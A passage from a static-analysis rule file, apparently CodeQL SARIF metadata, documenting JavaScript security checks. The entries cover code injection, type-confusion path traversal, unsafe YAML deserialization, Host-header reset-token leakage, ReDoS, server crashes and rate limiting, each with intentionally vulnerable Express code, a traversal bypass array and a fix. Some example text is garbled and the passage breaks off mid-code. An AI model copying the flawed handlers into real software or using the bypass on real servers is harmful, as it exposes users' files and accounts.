- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Improper code sanitization\nUsing string concatenation to construct JavaScript code can be error-prone, or in the worst case, enable code injection if an input is constructed by an attacker.\n\n\n## Recommendation\nIf using `JSON.stringify` or an HTML sanitizer to sanitize a string inserted into JavaScript code, then make sure to perform additional sanitization or remove potentially dangerous characters.\n\n\n## Example\nThe example below constructs a function that assigns the number 42 to the property `key` on an object `obj`. However, if `key` contains ``, then the generated code will break out of a `` if inserted into a `` tag.\n\n\n```javascript\nfunction createObjectWrite() {\n const assignment = `obj[${JSON.stringify(key)}]=42`;\n return `(function(){${assignment}})` // NOT OK\n}\n```\nThe issue has been fixed by escaping potentially dangerous characters, as shown below.\n\n\n```javascript\nconst charMap = {\n '<': '\\\\u003C',\n '>' : '\\\\u003E',\n '/': '\\\\u002F',\n '\\\\': '\\\\\\\\',\n '\\b': '\\\\b',\n '\\f': '\\\\f',\n '\\n': '\\\\n',\n '\\r': '\\\\r',\n '\\t': '\\\\t',\n '\\0': '\\\\0',\n '\\u2028': '\\\\u2028',\n '\\u2029': '\\\\u2029'\n};\n\nfunction escapeUnsafeChars(str) {\n return str.replace(/[<>\\b\\f\\n\\r\\t\\0\\u2028\\u2029]/g, x => charMap[x])\n}\n\nfunction createObjectWrite() {\n const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`;\n return `(function(){${assignment}})` // OK\n}\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n", - "markdown" : "# Improper code sanitization\nUsing string 
concatenation to construct JavaScript code can be error-prone, or in the worst case, enable code injection if an input is constructed by an attacker.\n\n\n## Recommendation\nIf using `JSON.stringify` or an HTML sanitizer to sanitize a string inserted into JavaScript code, then make sure to perform additional sanitization or remove potentially dangerous characters.\n\n\n## Example\nThe example below constructs a function that assigns the number 42 to the property `key` on an object `obj`. However, if `key` contains ``, then the generated code will break out of a `` if inserted into a `` tag.\n\n\n```javascript\nfunction createObjectWrite() {\n const assignment = `obj[${JSON.stringify(key)}]=42`;\n return `(function(){${assignment}})` // NOT OK\n}\n```\nThe issue has been fixed by escaping potentially dangerous characters, as shown below.\n\n\n```javascript\nconst charMap = {\n '<': '\\\\u003C',\n '>' : '\\\\u003E',\n '/': '\\\\u002F',\n '\\\\': '\\\\\\\\',\n '\\b': '\\\\b',\n '\\f': '\\\\f',\n '\\n': '\\\\n',\n '\\r': '\\\\r',\n '\\t': '\\\\t',\n '\\0': '\\\\0',\n '\\u2028': '\\\\u2028',\n '\\u2029': '\\\\u2029'\n};\n\nfunction escapeUnsafeChars(str) {\n return str.replace(/[<>\\b\\f\\n\\r\\t\\0\\u2028\\u2029]/g, x => charMap[x])\n}\n\nfunction createObjectWrite() {\n const assignment = `obj[${escapeUnsafeChars(JSON.stringify(key))}]=42`;\n return `(function(){${assignment}})` // OK\n}\n```\n\n## References\n* OWASP: [Code Injection](https://www.owasp.org/index.php/Code_Injection).\n* Common Weakness Enumeration: [CWE-94](https://cwe.mitre.org/data/definitions/94.html).\n* Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-094", "external/cwe/cwe-079", "external/cwe/cwe-116" ], - "description" : "Escaping code as HTML does not provide protection against code injection.", 
- "id" : "js/bad-code-sanitization", - "kind" : "path-problem", - "name" : "Improper code sanitization", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "6.1" - } - }, { - "id" : "js/type-confusion-through-parameter-tampering", - "name" : "js/type-confusion-through-parameter-tampering", - "shortDescription" : { - "text" : "Type confusion through parameter tampering" - }, - "fullDescription" : { - "text" : "Sanitizing an HTTP request parameter may be ineffective if the user controls its type." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Type confusion through parameter tampering\nSanitizing untrusted HTTP request parameters is a common technique for preventing injection attacks such as SQL injection or path traversal. This is sometimes done by checking if the request parameters contain blacklisted substrings.\n\nHowever, sanitizing request parameters assuming they have type `String` and using the builtin string methods such as `String.prototype.indexOf` is susceptible to type confusion attacks. In a type confusion attack, an attacker tampers with an HTTP request parameter such that it has a value of type `Array` instead of the expected type `String`. Furthermore, the content of the array has been crafted to bypass sanitizers by exploiting that some identically named methods of strings and arrays behave differently.\n\n\n## Recommendation\nCheck the runtime type of sanitizer inputs if the input type is user-controlled.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\n\n## Example\nFor example, Node.js server frameworks usually present request parameters as strings. 
But if an attacker sends multiple request parameters with the same name, then the request parameter is represented as an array instead.\n\nIn the following example, a sanitizer checks that a path does not contain the `\"..\"` string, which would allow an attacker to access content outside a user-accessible directory.\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (file.indexOf(\"..\") !== -1) {\n // BAD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\nAs written, this sanitizer is ineffective: an array like `[\"../\", \"/../secret.txt\"]` will bypass the sanitizer. The array does not contain `\"..\"` as an element, so the call to `indexOf` returns `-1` . This is problematic since the value of the `absolute` variable then ends up being `\"/secret.txt\"`. 
This happens since the concatenation of `\"/public/\"` and the array results in `\"/public/../,/../secret.txt\"`, which the `resolve`-call converts to `\"/secret.txt\"`.\n\nTo fix the sanitizer, check that the request parameter is a string, and not an array:\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (typeof file !== 'string' || file.indexOf(\"..\") !== -1) {\n // GOOD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\n\n## References\n* Node.js API: [querystring](https://nodejs.org/api/querystring.html).\n* Common Weakness Enumeration: [CWE-843](https://cwe.mitre.org/data/definitions/843.html).\n", - "markdown" : "# Type confusion through parameter tampering\nSanitizing untrusted HTTP request parameters is a common technique for preventing injection attacks such as SQL injection or path traversal. This is sometimes done by checking if the request parameters contain blacklisted substrings.\n\nHowever, sanitizing request parameters assuming they have type `String` and using the builtin string methods such as `String.prototype.indexOf` is susceptible to type confusion attacks. In a type confusion attack, an attacker tampers with an HTTP request parameter such that it has a value of type `Array` instead of the expected type `String`. 
Furthermore, the content of the array has been crafted to bypass sanitizers by exploiting that some identically named methods of strings and arrays behave differently.\n\n\n## Recommendation\nCheck the runtime type of sanitizer inputs if the input type is user-controlled.\n\nAn even safer alternative is to design the application so that sanitization is not needed, for instance by using prepared statements for SQL queries.\n\n\n## Example\nFor example, Node.js server frameworks usually present request parameters as strings. But if an attacker sends multiple request parameters with the same name, then the request parameter is represented as an array instead.\n\nIn the following example, a sanitizer checks that a path does not contain the `\"..\"` string, which would allow an attacker to access content outside a user-accessible directory.\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (file.indexOf(\"..\") !== -1) {\n // BAD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\nAs written, this sanitizer is ineffective: an array like `[\"../\", \"/../secret.txt\"]` will bypass the sanitizer. The array does not contain `\"..\"` as an element, so the call to `indexOf` returns `-1` . This is problematic since the value of the `absolute` variable then ends up being `\"/secret.txt\"`. 
This happens since the concatenation of `\"/public/\"` and the array results in `\"/public/../,/../secret.txt\"`, which the `resolve`-call converts to `\"/secret.txt\"`.\n\nTo fix the sanitizer, check that the request parameter is a string, and not an array:\n\n\n```javascript\nvar app = require(\"express\")(),\n path = require(\"path\");\n\napp.get(\"/user-files\", function(req, res) {\n var file = req.param(\"file\");\n if (typeof file !== 'string' || file.indexOf(\"..\") !== -1) {\n // GOOD\n // we forbid relative paths that contain ..\n // as these could leave the public directory\n res.status(400).send(\"Bad request\");\n } else {\n var absolute = path.resolve(\"/public/\" + file);\n console.log(\"Sending file: %s\", absolute);\n res.sendFile(absolute);\n }\n});\n\n```\n\n## References\n* Node.js API: [querystring](https://nodejs.org/api/querystring.html).\n* Common Weakness Enumeration: [CWE-843](https://cwe.mitre.org/data/definitions/843.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-843" ], - "description" : "Sanitizing an HTTP request parameter may be ineffective if the user controls its type.", - "id" : "js/type-confusion-through-parameter-tampering", - "kind" : "path-problem", - "name" : "Type confusion through parameter tampering", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.8" - } - }, { - "id" : "js/unsafe-deserialization", - "name" : "js/unsafe-deserialization", - "shortDescription" : { - "text" : "Deserialization of user-controlled data" - }, - "fullDescription" : { - "text" : "Deserializing user-controlled data may allow attackers to execute arbitrary code." 
- }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Deserialization of user-controlled data\nDeserializing untrusted data using any deserialization framework that allows the construction of arbitrary functions is easily exploitable and, in many cases, allows an attacker to execute arbitrary code.\n\n\n## Recommendation\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it, then use formats like JSON or XML that cannot represent functions. When using YAML or other formats that support the serialization and deserialization of functions, ensure that the parser is configured to disable deserialization of arbitrary functions.\n\n\n## Example\nThe following example calls the `load` function of the popular `js-yaml` package on data that comes from an HTTP request and hence is inherently unsafe.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.load(req.params.data);\n // ...\n});\n\n```\nUsing the `safeLoad` function instead (which does not deserialize YAML-encoded functions) removes the vulnerability.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.safeLoad(req.params.data);\n // ...\n});\n\n```\n\n## References\n* OWASP vulnerability description: [Deserialization of untrusted data](https://www.owasp.org/index.php/Deserialization_of_untrusted_data).\n* OWASP guidance on deserializing objects: [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html).\n* Neal Poole: [Code Execution via YAML in JS-YAML Node.js Module](https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/).\n* Common Weakness Enumeration: [CWE-502](https://cwe.mitre.org/data/definitions/502.html).\n", - "markdown" : "# 
Deserialization of user-controlled data\nDeserializing untrusted data using any deserialization framework that allows the construction of arbitrary functions is easily exploitable and, in many cases, allows an attacker to execute arbitrary code.\n\n\n## Recommendation\nAvoid deserialization of untrusted data if at all possible. If the architecture permits it, then use formats like JSON or XML that cannot represent functions. When using YAML or other formats that support the serialization and deserialization of functions, ensure that the parser is configured to disable deserialization of arbitrary functions.\n\n\n## Example\nThe following example calls the `load` function of the popular `js-yaml` package on data that comes from an HTTP request and hence is inherently unsafe.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.load(req.params.data);\n // ...\n});\n\n```\nUsing the `safeLoad` function instead (which does not deserialize YAML-encoded functions) removes the vulnerability.\n\n\n```javascript\nconst app = require(\"express\")(),\n jsyaml = require(\"js-yaml\");\n\napp.get(\"load\", function(req, res) {\n let data = jsyaml.safeLoad(req.params.data);\n // ...\n});\n\n```\n\n## References\n* OWASP vulnerability description: [Deserialization of untrusted data](https://www.owasp.org/index.php/Deserialization_of_untrusted_data).\n* OWASP guidance on deserializing objects: [Deserialization Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Deserialization_Cheat_Sheet.html).\n* Neal Poole: [Code Execution via YAML in JS-YAML Node.js Module](https://nealpoole.com/blog/2013/06/code-execution-via-yaml-in-js-yaml-nodejs-module/).\n* Common Weakness Enumeration: [CWE-502](https://cwe.mitre.org/data/definitions/502.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-502" ], - "description" : "Deserializing user-controlled data may allow 
attackers to\n execute arbitrary code.", - "id" : "js/unsafe-deserialization", - "kind" : "path-problem", - "name" : "Deserialization of user-controlled data", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "9.8" - } - }, { - "id" : "js/host-header-forgery-in-email-generation", - "name" : "js/host-header-forgery-in-email-generation", - "shortDescription" : { - "text" : "Host header poisoning in email generation" - }, - "fullDescription" : { - "text" : "Using the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Host header poisoning in email generation\nUsing the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens. A malicious user can send an HTTP request to the targeted web site, but with a Host header that refers to his own web site. This means the emails will be sent out to potential victims, originating from a server they trust, but with links leading to a malicious web site.\n\nIf the email contains a password reset link, and should the victim click the link, the secret reset token will be leaked to the attacker. Using the leaked token, the attacker can then construct the real reset link and use it to change the victim's password.\n\n\n## Recommendation\nObtain the server's host name from a configuration file and avoid relying on the Host header.\n\n\n## Example\nThe following example uses the `req.host` to generate a password reset link. 
This value is derived from the Host header, and can thus be set to anything by an attacker:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${req.host}/resettoken/${token}`,\n });\n});\n\n```\nTo ensure the link refers to the correct web site, get the host name from a configuration file:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${config.hostname}/resettoken/${token}`,\n });\n});\n\n```\n\n## References\n* Mitre: [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html).\n* Ian Muscat: [What is a Host Header Attack?](https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/).\n* Common Weakness Enumeration: [CWE-640](https://cwe.mitre.org/data/definitions/640.html).\n", - "markdown" : "# Host header poisoning in email generation\nUsing the HTTP Host header to construct a link in an email can facilitate phishing attacks and leak password reset tokens. 
A malicious user can send an HTTP request to the targeted web site, but with a Host header that refers to his own web site. This means the emails will be sent out to potential victims, originating from a server they trust, but with links leading to a malicious web site.\n\nIf the email contains a password reset link, and should the victim click the link, the secret reset token will be leaked to the attacker. Using the leaked token, the attacker can then construct the real reset link and use it to change the victim's password.\n\n\n## Recommendation\nObtain the server's host name from a configuration file and avoid relying on the Host header.\n\n\n## Example\nThe following example uses the `req.host` to generate a password reset link. This value is derived from the Host header, and can thus be set to anything by an attacker:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${req.host}/resettoken/${token}`,\n });\n});\n\n```\nTo ensure the link refers to the correct web site, get the host name from a configuration file:\n\n\n```javascript\nlet nodemailer = require('nodemailer');\nlet express = require('express');\nlet backend = require('./backend');\n\nlet app = express();\n\nlet config = JSON.parse(fs.readFileSync('config.json', 'utf8'));\n\napp.post('/resetpass', (req, res) => {\n let email = req.query.email;\n let transport = nodemailer.createTransport(config.smtp);\n let token = backend.getUserSecretResetToken(email);\n transport.sendMail({\n from: 
'webmaster@example.com',\n to: email,\n subject: 'Forgot password',\n text: `Click to reset password: https://${config.hostname}/resettoken/${token}`,\n });\n});\n\n```\n\n## References\n* Mitre: [CWE-640: Weak Password Recovery Mechanism for Forgotten Password](https://cwe.mitre.org/data/definitions/640.html).\n* Ian Muscat: [What is a Host Header Attack?](https://www.acunetix.com/blog/articles/automated-detection-of-host-header-attacks/).\n* Common Weakness Enumeration: [CWE-640](https://cwe.mitre.org/data/definitions/640.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-640" ], - "description" : "Using the HTTP Host header to construct a link in an email can facilitate phishing\n attacks and leak password reset tokens.", - "id" : "js/host-header-forgery-in-email-generation", - "kind" : "path-problem", - "name" : "Host header poisoning in email generation", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "9.8" - } - }, { - "id" : "js/regex-injection", - "name" : "js/regex-injection", - "shortDescription" : { - "text" : "Regular expression injection" - }, - "fullDescription" : { - "text" : "User input should not be used in regular expressions without first being escaped, otherwise a malicious user may be able to inject an expression that could require exponential time on certain inputs." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "error" - }, - "help" : { - "text" : "# Regular expression injection\nConstructing a regular expression with unsanitized user input is dangerous as a malicious user may be able to modify the meaning of the expression. 
In particular, such a user may be able to provide a regular expression fragment that takes exponential time in the worst case, and use that to perform a Denial of Service attack.\n\n\n## Recommendation\nBefore embedding user input into a regular expression, use a sanitization function such as lodash's `_.escapeRegExp` to escape meta-characters that have special meaning.\n\n\n## Example\nThe following example shows a HTTP request parameter that is used to construct a regular expression without sanitizing it first:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // BAD: Unsanitized user input is used to construct a regular expression\n var re = new RegExp(\"\\\\b\" + key + \"=(.*)\\n\");\n});\n\n```\nInstead, the request parameter should be sanitized first, for example using the function `_.escapeRegExp` from the lodash package. This ensures that the user cannot insert characters which have a special meaning in regular expressions.\n\n\n```javascript\nvar express = require('express');\nvar _ = require('lodash');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // GOOD: User input is sanitized before constructing the regex\n var safeKey = _.escapeRegExp(key);\n var re = new RegExp(\"\\\\b\" + safeKey + \"=(.*)\\n\");\n});\n\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* npm: [lodash](https://www.npmjs.com/package/lodash).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Regular expression injection\nConstructing a regular 
expression with unsanitized user input is dangerous as a malicious user may be able to modify the meaning of the expression. In particular, such a user may be able to provide a regular expression fragment that takes exponential time in the worst case, and use that to perform a Denial of Service attack.\n\n\n## Recommendation\nBefore embedding user input into a regular expression, use a sanitization function such as lodash's `_.escapeRegExp` to escape meta-characters that have special meaning.\n\n\n## Example\nThe following example shows a HTTP request parameter that is used to construct a regular expression without sanitizing it first:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // BAD: Unsanitized user input is used to construct a regular expression\n var re = new RegExp(\"\\\\b\" + key + \"=(.*)\\n\");\n});\n\n```\nInstead, the request parameter should be sanitized first, for example using the function `_.escapeRegExp` from the lodash package. 
This ensures that the user cannot insert characters which have a special meaning in regular expressions.\n\n\n```javascript\nvar express = require('express');\nvar _ = require('lodash');\nvar app = express();\n\napp.get('/findKey', function(req, res) {\n var key = req.param(\"key\"), input = req.param(\"input\");\n\n // GOOD: User input is sanitized before constructing the regex\n var safeKey = _.escapeRegExp(key);\n var re = new RegExp(\"\\\\b\" + safeKey + \"=(.*)\\n\");\n});\n\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* npm: [lodash](https://www.npmjs.com/package/lodash).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-730", "external/cwe/cwe-400" ], - "description" : "User input should not be used in regular expressions without first being escaped,\n otherwise a malicious user may be able to inject an expression that could require\n exponential time on certain inputs.", - "id" : "js/regex-injection", - "kind" : "path-problem", - "name" : "Regular expression injection", - "precision" : "high", - "problem.severity" : "error", - "security-severity" : "7.5" - } - }, { - "id" : "js/server-crash", - "name" : "js/server-crash", - "shortDescription" : { - "text" : "Server crash" - }, - "fullDescription" : { - "text" : "A server that can be forced to crash may be vulnerable to denial-of-service attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Server crash\nServers handle requests from clients until terminated deliberately by a server administrator. 
A client request that results in an uncaught server-side exception causes the current server response generation to fail, and should not have an effect on subsequent client requests.\n\nUnder some circumstances, uncaught exceptions can however cause the entire server to terminate abruptly. Such a behavior is highly undesirable, especially if it gives malicious users the ability to turn off the server at will, which is an efficient denial-of-service attack.\n\n\n## Recommendation\nEnsure that the processing of client requests can not cause uncaught exceptions to terminate the entire server abruptly.\n\n\n## Example\nThe following server code checks if a client-provided file path is valid before saving data to that path. It would be reasonable to expect that the server responds with an error in case the request contains an invalid file path. However, the server instead throws an exception, which is uncaught in the context of the asynchronous callback invocation (`fs.access(...)`). This causes the entire server to terminate abruptly.\n\n\n```javascript\nconst express = require(\"express\"),\n fs = require(\"fs\");\n\nfunction save(rootDir, path, content) {\n if (!isValidPath(rootDir, req.query.filePath)) {\n throw new Error(`Invalid filePath: ${req.query.filePath}`); // BAD crashes the server\n }\n // write content to disk\n}\n\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n if (err) {\n console.error(\n `Server setup is corrupted, ${rootDir} cannot be accessed!`\n );\n res.status(500);\n res.end();\n return;\n }\n save(rootDir, req.query.path, req.body);\n res.status(200);\n res.end();\n });\n});\n\n```\nTo remedy this, the server can catch the exception explicitly with a `try/catch` block, and generate an appropriate error response instead:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n // ...\n try {\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n 
res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n });\n});\n\n```\nTo simplify exception handling, it may be advisable to switch to async/await syntax instead of using callbacks, which allows wrapping the entire request handler in a `try/catch` block:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", async (req, res) => {\n try {\n await fs.promises.access(rootDir);\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-248](https://cwe.mitre.org/data/definitions/248.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n", - "markdown" : "# Server crash\nServers handle requests from clients until terminated deliberately by a server administrator. A client request that results in an uncaught server-side exception causes the current server response generation to fail, and should not have an effect on subsequent client requests.\n\nUnder some circumstances, uncaught exceptions can however cause the entire server to terminate abruptly. Such a behavior is highly undesirable, especially if it gives malicious users the ability to turn off the server at will, which is an efficient denial-of-service attack.\n\n\n## Recommendation\nEnsure that the processing of client requests can not cause uncaught exceptions to terminate the entire server abruptly.\n\n\n## Example\nThe following server code checks if a client-provided file path is valid before saving data to that path. It would be reasonable to expect that the server responds with an error in case the request contains an invalid file path. However, the server instead throws an exception, which is uncaught in the context of the asynchronous callback invocation (`fs.access(...)`). 
This causes the entire server to terminate abruptly.\n\n\n```javascript\nconst express = require(\"express\"),\n fs = require(\"fs\");\n\nfunction save(rootDir, path, content) {\n if (!isValidPath(rootDir, req.query.filePath)) {\n throw new Error(`Invalid filePath: ${req.query.filePath}`); // BAD crashes the server\n }\n // write content to disk\n}\n\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n if (err) {\n console.error(\n `Server setup is corrupted, ${rootDir} cannot be accessed!`\n );\n res.status(500);\n res.end();\n return;\n }\n save(rootDir, req.query.path, req.body);\n res.status(200);\n res.end();\n });\n});\n\n```\nTo remedy this, the server can catch the exception explicitly with a `try/catch` block, and generate an appropriate error response instead:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", (req, res) => {\n fs.access(rootDir, (err) => {\n // ...\n try {\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n });\n});\n\n```\nTo simplify exception handling, it may be advisable to switch to async/await syntax instead of using callbacks, which allows wrapping the entire request handler in a `try/catch` block:\n\n\n```javascript\n// ...\nexpress().post(\"/save\", async (req, res) => {\n try {\n await fs.promises.access(rootDir);\n save(rootDir, req.query.path, req.body); // GOOD exception is caught below\n res.status(200);\n res.end();\n } catch (e) {\n res.status(500);\n res.end();\n }\n});\n\n```\n\n## References\n* Common Weakness Enumeration: [CWE-248](https://cwe.mitre.org/data/definitions/248.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n" - }, - "properties" : { - "tags" : [ "security", "external/cwe/cwe-248", "external/cwe/cwe-730" ], - "description" : "A server that can be forced to crash may be vulnerable to denial-of-service\n attacks.", - 
"id" : "js/server-crash", - "kind" : "path-problem", - "name" : "Server crash", - "precision" : "high", - "problem.severity" : "warning", - "security-severity" : "7.5" - } - }, { - "id" : "js/missing-rate-limiting", - "name" : "js/missing-rate-limiting", - "shortDescription" : { - "text" : "Missing rate limiting" - }, - "fullDescription" : { - "text" : "An HTTP request handler that performs expensive operations without restricting the rate at which operations can be carried out is vulnerable to denial-of-service attacks." - }, - "defaultConfiguration" : { - "enabled" : true, - "level" : "warning" - }, - "help" : { - "text" : "# Missing rate limiting\nHTTP request handlers should not perform expensive operations such as accessing the file system, executing an operating system command or interacting with a database without limiting the rate at which requests are accepted. Otherwise, the application becomes vulnerable to denial-of-service attacks where an attacker can cause the application to crash or become unresponsive by issuing a large number of requests at the same time.\n\n\n## Recommendation\nA rate-limiting middleware should be used to prevent such attacks.\n\n\n## Example\nThe following example shows an Express application that serves static files without rate limiting:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\nTo prevent denial-of-service attacks, the `express-rate-limit` package can be used:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\n// set up rate limiter: maximum of five requests per minute\nvar RateLimit = require('express-rate-limit');\nvar limiter = RateLimit({\n windowMs: 15 * 60 * 1000, // 15 minutes\n max: 100, // max 100 requests per windowMs\n});\n\n// apply rate limiter to all requests\napp.use(limiter);\n\napp.get('/:path', function(req, res) {\n 
let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\n\n## References\n* OWASP: [Denial of Service Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Denial_of_Service_Cheat_Sheet.html).\n* Wikipedia: [Denial-of-service attack](https://en.wikipedia.org/wiki/Denial-of-service_attack).\n* NPM: [express-rate-limit](https://www.npmjs.com/package/express-rate-limit).\n* Common Weakness Enumeration: [CWE-770](https://cwe.mitre.org/data/definitions/770.html).\n* Common Weakness Enumeration: [CWE-307](https://cwe.mitre.org/data/definitions/307.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n", - "markdown" : "# Missing rate limiting\nHTTP request handlers should not perform expensive operations such as accessing the file system, executing an operating system command or interacting with a database without limiting the rate at which requests are accepted. Otherwise, the application becomes vulnerable to denial-of-service attacks where an attacker can cause the application to crash or become unresponsive by issuing a large number of requests at the same time.\n\n\n## Recommendation\nA rate-limiting middleware should be used to prevent such attacks.\n\n\n## Example\nThe following example shows an Express application that serves static files without rate limiting:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\napp.get('/:path', function(req, res) {\n let path = req.params.path;\n if (isValidPath(path))\n res.sendFile(path);\n});\n\n```\nTo prevent denial-of-service attacks, the `express-rate-limit` package can be used:\n\n\n```javascript\nvar express = require('express');\nvar app = express();\n\n// set up rate limiter: maximum of five requests per minute\nvar RateLimit = require('express-rate-limit');\nvar limiter = RateLimit({\n windowMs: 